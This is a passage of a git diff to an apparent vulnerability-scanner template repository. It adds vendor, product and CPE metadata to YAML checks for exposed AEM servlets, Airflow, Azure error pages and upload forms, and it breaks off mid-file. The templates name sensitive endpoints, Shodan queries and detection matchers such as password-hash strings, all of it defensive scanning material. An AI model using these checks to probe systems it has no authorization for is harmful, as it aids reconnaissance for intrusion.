4a0a0047304502206b4bee6bb842af88daf29023d61c1696dd19f32c479e516ca00dad284abbe97a022100eaff461770fad8ee9f38e10b6cf918a85b5e58312662167fb57205f713ecbfcb:922c64590222798bb761d5b6d8e72950 diff --git a/http/miscellaneous/exposed-file-upload-form.yaml b/http/miscellaneous/exposed-file-upload-form.yaml index b035abc178..f976c6fdc1 100644 --- a/http/miscellaneous/exposed-file-upload-form.yaml +++ b/http/miscellaneous/exposed-file-upload-form.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: http.html:"multipart/form-data" html:"file" + product: creativedream_file_uploader + vendor: creativedream_file_uploader_project tags: miscellaneous,exposure,upload,form,misc,generic + classification: + cpe: cpe:2.3:a:creativedream_file_uploader_project:creativedream_file_uploader:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +33,4 @@ http: - "type=[\"'](file)[\"']" - 'id="file"' condition: or -# digest: 490a0046304402206e7efb13f76fa18665f5ecd860e844ce34e9b8b807437aefa6aa591e53a25fa2022048ca326395148e880ff617e8a94bce723ee32cd0531124508a71e6f8623416c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206e7efb13f76fa18665f5ecd860e844ce34e9b8b807437aefa6aa591e53a25fa2022048ca326395148e880ff617e8a94bce723ee32cd0531124508a71e6f8623416c7:922c64590222798bb761d5b6d8e72950 diff --git a/http/miscellaneous/microsoft-azure-error.yaml b/http/miscellaneous/microsoft-azure-error.yaml index e8bebb0e4f..219bd6ffb4 100644 --- a/http/miscellaneous/microsoft-azure-error.yaml +++ b/http/miscellaneous/microsoft-azure-error.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: title:"Microsoft Azure Web App - Error 404" + product: azure_app_service_on_azure_stack + vendor: microsoft tags: error,azure,microsoft,misc,takeover,miscellaneous + classification: + cpe: cpe:2.3:a:microsoft:azure_app_service_on_azure_stack:*:*:*:*:*:*:*:* http: - method: GET path: @@ -25,4 +29,4 @@ http: - type: status status: - 404 -# digest: 4a0a0047304502204a9bad4bc12268feabed41f652364c040732e493e45c928b916ddfd8637e7c7e022100ea34fe6ee4b290fe917f08672cdc32c0c9a55c4ffc3a9dc8957c4c22f3444df3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204a9bad4bc12268feabed41f652364c040732e493e45c928b916ddfd8637e7c7e022100ea34fe6ee4b290fe917f08672cdc32c0c9a55c4ffc3a9dc8957c4c22f3444df3:922c64590222798bb761d5b6d8e72950 diff --git a/http/miscellaneous/netflix-conductor-version.yaml b/http/miscellaneous/netflix-conductor-version.yaml index a7c5adeeee..f6460f2500 100644 --- a/http/miscellaneous/netflix-conductor-version.yaml +++ b/http/miscellaneous/netflix-conductor-version.yaml @@ -11,8 +11,12 @@ info: metadata: max-request: 2 shodan-query: http.title:"Conductor UI", http.title:"Workflow UI" + product: conductor + vendor: netflix tags: miscellaneous,tech,netflix,conductor,api,misc + classification: + cpe: cpe:2.3:a:netflix:conductor:*:*:*:*:*:*:*:* http: - method: GET path: @@ -44,4 +48,4 @@ http: regex: - 'conductor\-server\-([0-9.]+)\-' - '"version":"([0-9.]+)\-' -# digest: 4a0a00473045022100f085f5c985f24b094d4d7e8e9f979b4df02e80f09e2223134899c424905ed62a0220341316f030601c3fa11dd9ddb2788edced8e20970cebd628002903d83af1856e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f085f5c985f24b094d4d7e8e9f979b4df02e80f09e2223134899c424905ed62a0220341316f030601c3fa11dd9ddb2788edced8e20970cebd628002903d83af1856e:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/aem/aem-acs-common.yaml b/http/misconfiguration/aem/aem-acs-common.yaml index 73302e5f9b..0d4e51268d 100644 --- a/http/misconfiguration/aem/aem-acs-common.yaml +++ b/http/misconfiguration/aem/aem-acs-common.yaml @@ -12,8 +12,12 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" + product: acs_aem_commons + vendor: adobe tags: misconfig,aem,adobe + classification: + cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +36,4 @@ http: - 'JCR Compare | ACS AEM Commons' - 'Workflow Remover | ACS AEM Commons' condition: or -# digest: 490a00463044022000b0ff7eef39f80727143517276c8c058d1ac932e761c6f97b8b655df992c1b00220288ff39cd43ef4a8660eaeef3dd133a1fc4c1bb204d708ca8d97ac0d260a47e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022000b0ff7eef39f80727143517276c8c058d1ac932e761c6f97b8b655df992c1b00220288ff39cd43ef4a8660eaeef3dd133a1fc4c1bb204d708ca8d97ac0d260a47e1:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/aem/aem-bg-servlet.yaml b/http/misconfiguration/aem/aem-bg-servlet.yaml index b751c4f52a..24eafb96c2 100644 --- a/http/misconfiguration/aem/aem-bg-servlet.yaml +++ b/http/misconfiguration/aem/aem-bg-servlet.yaml @@ -9,8 +9,12 @@ info: metadata: max-request: 1 shodan-query: http.component:"Adobe Experience Manager" + product: experience_manager + vendor: adobe tags: aem,misconfig + classification: + cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/aem/aem-bulkeditor.yaml b/http/misconfiguration/aem/aem-bulkeditor.yaml index 0fab3bab46..0b50187c9c 100644 --- a/http/misconfiguration/aem/aem-bulkeditor.yaml +++ b/http/misconfiguration/aem/aem-bulkeditor.yaml @@ -11,8 +11,12 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" + product: experience_manager + vendor: adobe tags: misconfig,aem,adobe,editor + classification: + cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/aem/aem-cached-pages.yaml b/http/misconfiguration/aem/aem-cached-pages.yaml index 920d723076..64ce05b2b7 100644 --- a/http/misconfiguration/aem/aem-cached-pages.yaml +++ b/http/misconfiguration/aem/aem-cached-pages.yaml @@ -10,8 +10,12 @@ info: metadata: max-request: 1 shodan-query: http.component:"Adobe Experience Manager" + product: experience_manager + vendor: adobe tags: aem,misconfig + classification: + cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +35,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202f608d94be30b53e216e833e8a6063f31123faacbf9ea68c704ea9229c2caa6302200485991ab87b6a35c91fce9d0f5e132415cc05c79e05df52f2c910f9b4997dde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202f608d94be30b53e216e833e8a6063f31123faacbf9ea68c704ea9229c2caa6302200485991ab87b6a35c91fce9d0f5e132415cc05c79e05df52f2c910f9b4997dde:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/aem/aem-childrenlist-xss.yaml b/http/misconfiguration/aem/aem-childrenlist-xss.yaml index 5aab3e0161..0957c04f27 100644 --- a/http/misconfiguration/aem/aem-childrenlist-xss.yaml +++ b/http/misconfiguration/aem/aem-childrenlist-xss.yaml @@ -10,12 +10,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 + cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" + product: experience_manager + vendor: adobe tags: xss,aem,adobe,misconfig http: diff --git a/http/misconfiguration/aem/aem-crx-bypass.yaml b/http/misconfiguration/aem/aem-crx-bypass.yaml index 37c05f023d..9f900ef0fe 100644 --- a/http/misconfiguration/aem/aem-crx-bypass.yaml +++ b/http/misconfiguration/aem/aem-crx-bypass.yaml @@ -11,8 +11,12 @@ info: metadata: max-request: 2 shodan-query: http.component:"Adobe Experience Manager" + product: experience_manager + vendor: adobe tags: aem,adobe,misconfig + classification: + cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/misconfiguration/aem/aem-crx-namespace.yaml b/http/misconfiguration/aem/aem-crx-namespace.yaml index f0c5b299d2..d9fbf75aa8 100644 --- a/http/misconfiguration/aem/aem-crx-namespace.yaml +++ b/http/misconfiguration/aem/aem-crx-namespace.yaml @@ -12,8 +12,12 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" + product: experience_manager_cloud_service + vendor: adobe tags: exposure,aem,adobe,misconfig + classification: + cpe: cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f8e1524c8cd8d376fd5c9ad815f96d4dcc1e1f87f1b969b44011cb41b6ef8a4e022100b8d9db03b6373015199145e4f079c1479d6bbb404165ce8e819aa881bc771441:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f8e1524c8cd8d376fd5c9ad815f96d4dcc1e1f87f1b969b44011cb41b6ef8a4e022100b8d9db03b6373015199145e4f079c1479d6bbb404165ce8e819aa881bc771441:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/aem/aem-crx-search.yaml b/http/misconfiguration/aem/aem-crx-search.yaml index b16589b1c8..b68be5856f 100644 --- a/http/misconfiguration/aem/aem-crx-search.yaml +++ b/http/misconfiguration/aem/aem-crx-search.yaml @@ -11,8 +11,12 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" + product: acs_aem_commons + vendor: adobe tags: misconfig,aem,adobe,exposure + classification: + cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/aem/aem-custom-script.yaml b/http/misconfiguration/aem/aem-custom-script.yaml index f7f2c15f9f..1eb07f1f72 100644 --- a/http/misconfiguration/aem/aem-custom-script.yaml +++ b/http/misconfiguration/aem/aem-custom-script.yaml @@ -11,8 +11,12 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" + product: experience_manager + vendor: adobe tags: misconfig,aem,adobe + classification: + cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/aem/aem-debugging-libraries.yaml b/http/misconfiguration/aem/aem-debugging-libraries.yaml index ef5ccf6108..83da7380f8 100644 --- a/http/misconfiguration/aem/aem-debugging-libraries.yaml +++ b/http/misconfiguration/aem/aem-debugging-libraries.yaml @@ -13,8 +13,12 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" + product: acs_aem_commons + vendor: adobe tags: misconfig,aem,adobe + classification: + cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/aem/aem-default-get-servlet.yaml b/http/misconfiguration/aem/aem-default-get-servlet.yaml index f878f245f6..8c36f30959 100644 --- a/http/misconfiguration/aem/aem-default-get-servlet.yaml +++ b/http/misconfiguration/aem/aem-default-get-servlet.yaml @@ -11,8 +11,12 @@ info: metadata: max-request: 64 shodan-query: http.component:"Adobe Experience Manager" + product: experience_manager + vendor: adobe tags: aem,adobe,misconfig + classification: + cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* http: - method: GET path: @@ -96,4 +100,4 @@ http: words: - 'jcr:createdBy' condition: and -# digest: 490a004630440220104eb07638891f6d6febb6bc9d9b53106368a2ce53208b54d3975a6489f1073e02202a4249f0550aa06ca7d459cc6a9798d7ed77e1d7d7bf98344f3abad59bfb7136:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220104eb07638891f6d6febb6bc9d9b53106368a2ce53208b54d3975a6489f1073e02202a4249f0550aa06ca7d459cc6a9798d7ed77e1d7d7bf98344f3abad59bfb7136:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/aem/aem-disk-usage.yaml b/http/misconfiguration/aem/aem-disk-usage.yaml index ad2ac92f69..f723a98e03 100644 --- a/http/misconfiguration/aem/aem-disk-usage.yaml +++ b/http/misconfiguration/aem/aem-disk-usage.yaml @@ -12,8 +12,12 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" + product: acs_aem_commons + vendor: adobe tags: misconfig,aem,adobe,exposure + classification: + cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:* http: - method: GET path: @@ -38,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200555d5af56a7d2de9bf494904b6f84c28e8ca424ac008d59a06f50719835cf2002200be1973e4a0aa606b3ebec95d4d3bdc6da658c0655f494dfa8a323e9ee1a906b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200555d5af56a7d2de9bf494904b6f84c28e8ca424ac008d59a06f50719835cf2002200be1973e4a0aa606b3ebec95d4d3bdc6da658c0655f494dfa8a323e9ee1a906b:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/aem/aem-dump-contentnode.yaml b/http/misconfiguration/aem/aem-dump-contentnode.yaml index bd60d74a29..d99d6019b3 100644 --- a/http/misconfiguration/aem/aem-dump-contentnode.yaml +++ b/http/misconfiguration/aem/aem-dump-contentnode.yaml @@ -12,8 +12,12 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" + product: experience_manager_cloud_service + vendor: adobe tags: misconfig,aem,adobe + classification: + cpe: cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:* http: - method: GET path: @@ -46,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205d5bbe6ac19b50e900240a42f9d473d8905559b3f12249733d26aa4f7ab21f52022100d2ab3e983576ee3f9604a02809dd75ecfc1c6f7302a4148f74e422867f3b7f7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205d5bbe6ac19b50e900240a42f9d473d8905559b3f12249733d26aa4f7ab21f52022100d2ab3e983576ee3f9604a02809dd75ecfc1c6f7302a4148f74e422867f3b7f7c:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/aem/aem-explorer-nodetypes.yaml b/http/misconfiguration/aem/aem-explorer-nodetypes.yaml index 0a59004117..e3e9c7f466 100644 --- a/http/misconfiguration/aem/aem-explorer-nodetypes.yaml +++ b/http/misconfiguration/aem/aem-explorer-nodetypes.yaml @@ -12,8 +12,12 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" + product: experience_manager_cloud_service + vendor: adobe tags: misconfig,aem,adobe,exposure + classification: + cpe: cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210085e3be40289ff9dc95a53020c7f95e91deb14adb8d3dd368350d97076f0bf66702201e55b0378eb0d3c1cf7c0c38ceca8d15ad3ed8519322096d49105cc7c4b08002:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210085e3be40289ff9dc95a53020c7f95e91deb14adb8d3dd368350d97076f0bf66702201e55b0378eb0d3c1cf7c0c38ceca8d15ad3ed8519322096d49105cc7c4b08002:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/aem/aem-external-link-checker.yaml b/http/misconfiguration/aem/aem-external-link-checker.yaml index 5b889ec932..2cb06f60b4 100644 --- a/http/misconfiguration/aem/aem-external-link-checker.yaml +++ b/http/misconfiguration/aem/aem-external-link-checker.yaml @@ -11,8 +11,12 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" + product: acs_aem_commons + vendor: adobe tags: misconfig,aem,adobe,exposure + classification: + cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/aem/aem-gql-servlet.yaml b/http/misconfiguration/aem/aem-gql-servlet.yaml index 31fee07beb..f50157572d 100644 --- a/http/misconfiguration/aem/aem-gql-servlet.yaml +++ b/http/misconfiguration/aem/aem-gql-servlet.yaml @@ -10,8 +10,12 @@ info: metadata: max-request: 29 shodan-query: http.component:"Adobe Experience Manager" + product: experience_manager + vendor: adobe tags: aem,misconfig + classification: + cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* http: - method: GET path: @@ -62,4 +66,4 @@ http: - 'path' - 'hits' condition: and -# digest: 490a0046304402206193866bf0dd434662189198c5055f732162d34385c7367eeb2ae0e01bfa7c280220313b031c5d09c5ee1b46c97a0f6030379d2964a722e2c6765a265e3232d6cd87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206193866bf0dd434662189198c5055f732162d34385c7367eeb2ae0e01bfa7c280220313b031c5d09c5ee1b46c97a0f6030379d2964a722e2c6765a265e3232d6cd87:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/aem/aem-groovyconsole.yaml b/http/misconfiguration/aem/aem-groovyconsole.yaml index 5ad79602c0..f9563e0c1b 100644 --- a/http/misconfiguration/aem/aem-groovyconsole.yaml +++ b/http/misconfiguration/aem/aem-groovyconsole.yaml @@ -11,8 +11,12 @@ info: metadata: max-request: 2 shodan-query: http.component:"Adobe Experience Manager" + product: experience_manager_cloud_service + vendor: adobe tags: aem,adobe,hackerone,misconfig + classification: + cpe: cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/aem/aem-hash-querybuilder.yaml b/http/misconfiguration/aem/aem-hash-querybuilder.yaml index 3c179d1291..4d86b0cde4 100644 --- a/http/misconfiguration/aem/aem-hash-querybuilder.yaml +++ b/http/misconfiguration/aem/aem-hash-querybuilder.yaml @@ -10,8 +10,12 @@ info: metadata: max-request: 1 shodan-query: http.component:"Adobe Experience Manager" + product: acs_aem_commons + vendor: adobe tags: aem,misconfig + classification: + cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:* http: - raw: - | @@ -32,4 +36,4 @@ http: - '"success":true' - 'rep:password' condition: and -# digest: 4a0a00473045022100cb28ec85d528c4df5d807eecd666a91bd49b19e18ff697ba4d64930ae863334702202d6c99658248b15ba8e8c6ea8571dda1d95e41b9f6e4ea28bb30fdfad88520d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cb28ec85d528c4df5d807eecd666a91bd49b19e18ff697ba4d64930ae863334702202d6c99658248b15ba8e8c6ea8571dda1d95e41b9f6e4ea28bb30fdfad88520d7:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/aem/aem-login-status.yaml b/http/misconfiguration/aem/aem-login-status.yaml index 6c6ccdcea5..7ee77f1aaa 100644 --- a/http/misconfiguration/aem/aem-login-status.yaml +++ b/http/misconfiguration/aem/aem-login-status.yaml @@ -11,8 +11,12 @@ info: metadata: max-request: 3 shodan-query: http.component:"Adobe Experience Manager" + product: experience_manager + vendor: adobe tags: aem,adobe,misconfig + classification: + cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/aem/aem-merge-metadata-servlet.yaml b/http/misconfiguration/aem/aem-merge-metadata-servlet.yaml index 7f4a093732..ff7cde4e5a 100644 --- a/http/misconfiguration/aem/aem-merge-metadata-servlet.yaml +++ b/http/misconfiguration/aem/aem-merge-metadata-servlet.yaml @@ -9,8 +9,12 @@ info: metadata: max-request: 1 shodan-query: http.component:"Adobe Experience Manager" + product: experience_manager + vendor: adobe tags: aem,misconfig + classification: + cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/aem/aem-offloading-browser.yaml b/http/misconfiguration/aem/aem-offloading-browser.yaml index 054aca4cca..feed7799c9 100644 --- a/http/misconfiguration/aem/aem-offloading-browser.yaml +++ b/http/misconfiguration/aem/aem-offloading-browser.yaml @@ -12,8 +12,12 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" + product: acs_aem_commons + vendor: adobe tags: misconfig,aem,adobe + classification: + cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ed6f741d37fa078e6e94ee682b0ae460d82c9020ba655b55652381d0726cbdfd022100857d459aacb53af935255af6cfd652e284b92f792b54557cab7c13f6ba0962bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ed6f741d37fa078e6e94ee682b0ae460d82c9020ba655b55652381d0726cbdfd022100857d459aacb53af935255af6cfd652e284b92f792b54557cab7c13f6ba0962bc:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/aem/aem-osgi-bundles.yaml b/http/misconfiguration/aem/aem-osgi-bundles.yaml index a73da12308..c5967a06b0 100644 --- a/http/misconfiguration/aem/aem-osgi-bundles.yaml +++ b/http/misconfiguration/aem/aem-osgi-bundles.yaml @@ -12,8 +12,12 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" + product: acs_aem_commons + vendor: adobe tags: misconfig,aem,adobe + classification: + cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +34,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204e2d865541ec98c031958ea17a246e62f591878eb7937454afc7613d6eea1b29022054b04763a304b494c9a7d0314f70dfe6aadbb9251da3b120c0390cc3b841ebf4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204e2d865541ec98c031958ea17a246e62f591878eb7937454afc7613d6eea1b29022054b04763a304b494c9a7d0314f70dfe6aadbb9251da3b120c0390cc3b841ebf4:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml b/http/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml index f7195586f6..be1a4d779a 100644 --- a/http/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml +++ b/http/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml @@ -10,8 +10,12 @@ info: metadata: max-request: 4 shodan-query: http.component:"Adobe Experience Manager" + product: experience_manager + vendor: adobe tags: aem,misconfig + classification: + cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: - 'jcr:path' - 'success' condition: and -# digest: 4b0a00483046022100f6628f96cb4d633f700b66bc68bbff50e14437f1a7206af406d989d8e89b4943022100a70d967a5e148a69a9c18bdf1374c0f56e87283969a4ddc38eb81b9aa0af0421:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f6628f96cb4d633f700b66bc68bbff50e14437f1a7206af406d989d8e89b4943022100a70d967a5e148a69a9c18bdf1374c0f56e87283969a4ddc38eb81b9aa0af0421:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/aem/aem-querybuilder-json-servlet.yaml b/http/misconfiguration/aem/aem-querybuilder-json-servlet.yaml index 1ac26a526e..7168c38401 100644 --- a/http/misconfiguration/aem/aem-querybuilder-json-servlet.yaml +++ b/http/misconfiguration/aem/aem-querybuilder-json-servlet.yaml @@ -11,8 +11,12 @@ info: metadata: max-request: 8 shodan-query: http.component:"Adobe Experience Manager" + product: acs_aem_commons + vendor: adobe tags: aem,adobe,misconfig + classification: + cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/aem/aem-setpreferences-xss.yaml b/http/misconfiguration/aem/aem-setpreferences-xss.yaml index 24693866a5..53a04e9fdb 100644 --- a/http/misconfiguration/aem/aem-setpreferences-xss.yaml +++ b/http/misconfiguration/aem/aem-setpreferences-xss.yaml @@ -13,9 +13,12 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 + cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: http.component:"Adobe Experience Manager" + product: experience_manager + vendor: adobe tags: aem,xss,misconfig http: diff --git a/http/misconfiguration/aem/aem-sling-userinfo.yaml b/http/misconfiguration/aem/aem-sling-userinfo.yaml index c64eb6a05e..a0be433ec3 100644 --- a/http/misconfiguration/aem/aem-sling-userinfo.yaml +++ b/http/misconfiguration/aem/aem-sling-userinfo.yaml @@ -11,8 +11,12 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" + product: experience_manager + vendor: adobe tags: misconfig,aem,adobe,exposure + classification: + cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/aem/aem-userinfo-servlet.yaml b/http/misconfiguration/aem/aem-userinfo-servlet.yaml index f357a1863e..5b2f20e2b4 100644 --- a/http/misconfiguration/aem/aem-userinfo-servlet.yaml +++ b/http/misconfiguration/aem/aem-userinfo-servlet.yaml @@ -8,8 +8,12 @@ info: metadata: max-request: 1 shodan-query: http.component:"Adobe Experience Manager" + product: experience_manager + vendor: adobe tags: aem,misconfig + classification: + cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +36,4 @@ http: part: header words: - 'application/json' -# digest: 4b0a00483046022100cafd612968a71e2c99dc57d80e19456e1651f3661fb078df3ffbf5c1e3527aa90221009d782891fce13e73a531815ef5c121a3afa614c8a49be98820317d8f01ff0adb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cafd612968a71e2c99dc57d80e19456e1651f3661fb078df3ffbf5c1e3527aa90221009d782891fce13e73a531815ef5c121a3afa614c8a49be98820317d8f01ff0adb:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/airflow/airflow-debug.yaml b/http/misconfiguration/airflow/airflow-debug.yaml index 8742106678..0136ee583f 100644 --- a/http/misconfiguration/airflow/airflow-debug.yaml +++ b/http/misconfiguration/airflow/airflow-debug.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"Airflow - DAGs" + product: airflow + vendor: apache tags: apache,airflow,fpd,misconfig + classification: + cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* http: - method: GET path: @@ -28,4 +32,4 @@ http: - type: status status: - 500 -# digest: 4a0a00473045022100b07309b0cbd96d505399c9c82239f762478a3023c1e8556e3e6d773d6afd1416022012c8681190e9080dab6e8fb7278dd01ea443ade8c3845cd3550bda5352584ae9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b07309b0cbd96d505399c9c82239f762478a3023c1e8556e3e6d773d6afd1416022012c8681190e9080dab6e8fb7278dd01ea443ade8c3845cd3550bda5352584ae9:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/airflow/unauthenticated-airflow.yaml b/http/misconfiguration/airflow/unauthenticated-airflow.yaml index 02697451aa..de72e5617c 100644 --- a/http/misconfiguration/airflow/unauthenticated-airflow.yaml +++ b/http/misconfiguration/airflow/unauthenticated-airflow.yaml @@ -8,8 +8,12 @@ info: metadata: max-request: 2 shodan-query: title:"Airflow - DAGs" + product: airflow + vendor: apache tags: apache,airflow,unauth,misconfig + classification: + cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* http: - method: GET path: @@ -28,4 +32,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203f67cdf6f889648d2b9868d0ae6fd9171a87f9ca6e81af9475bd589420897c0602204c41171087e3d9a6ec9545451f3c7f2323d355b529dabda81886328ec356efe3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203f67cdf6f889648d2b9868d0ae6fd9171a87f9ca6e81af9475bd589420897c0602204c41171087e3d9a6ec9545451f3c7f2323d355b529dabda81886328ec356efe3:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/ampache-update-exposure.yaml b/http/misconfiguration/ampache-update-exposure.yaml index 0ced7ddb91..3d7180231f 100644 --- a/http/misconfiguration/ampache-update-exposure.yaml +++ b/http/misconfiguration/ampache-update-exposure.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: http.html:"Ampache Update" + product: ampache + vendor: ampache tags: misconfig,ampache,exposure + classification: + cpe: cpe:2.3:a:ampache:ampache:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +38,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008c0739e4fd795e10d4e26b6443d2e7aaaca3f7a319581604454da0b81291e1da0220044cbd8795a1b1cae54923ff98d84c81e7d7aceb029169ab143825e7caa870f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008c0739e4fd795e10d4e26b6443d2e7aaaca3f7a319581604454da0b81291e1da0220044cbd8795a1b1cae54923ff98d84c81e7d7aceb029169ab143825e7caa870f6:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/apache-drill-exposure.yaml b/http/misconfiguration/apache-drill-exposure.yaml index 5ae85c1fd8..c6389ee8ac 100644 --- a/http/misconfiguration/apache-drill-exposure.yaml +++ b/http/misconfiguration/apache-drill-exposure.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"Apache Drill" + product: drill + vendor: apache tags: 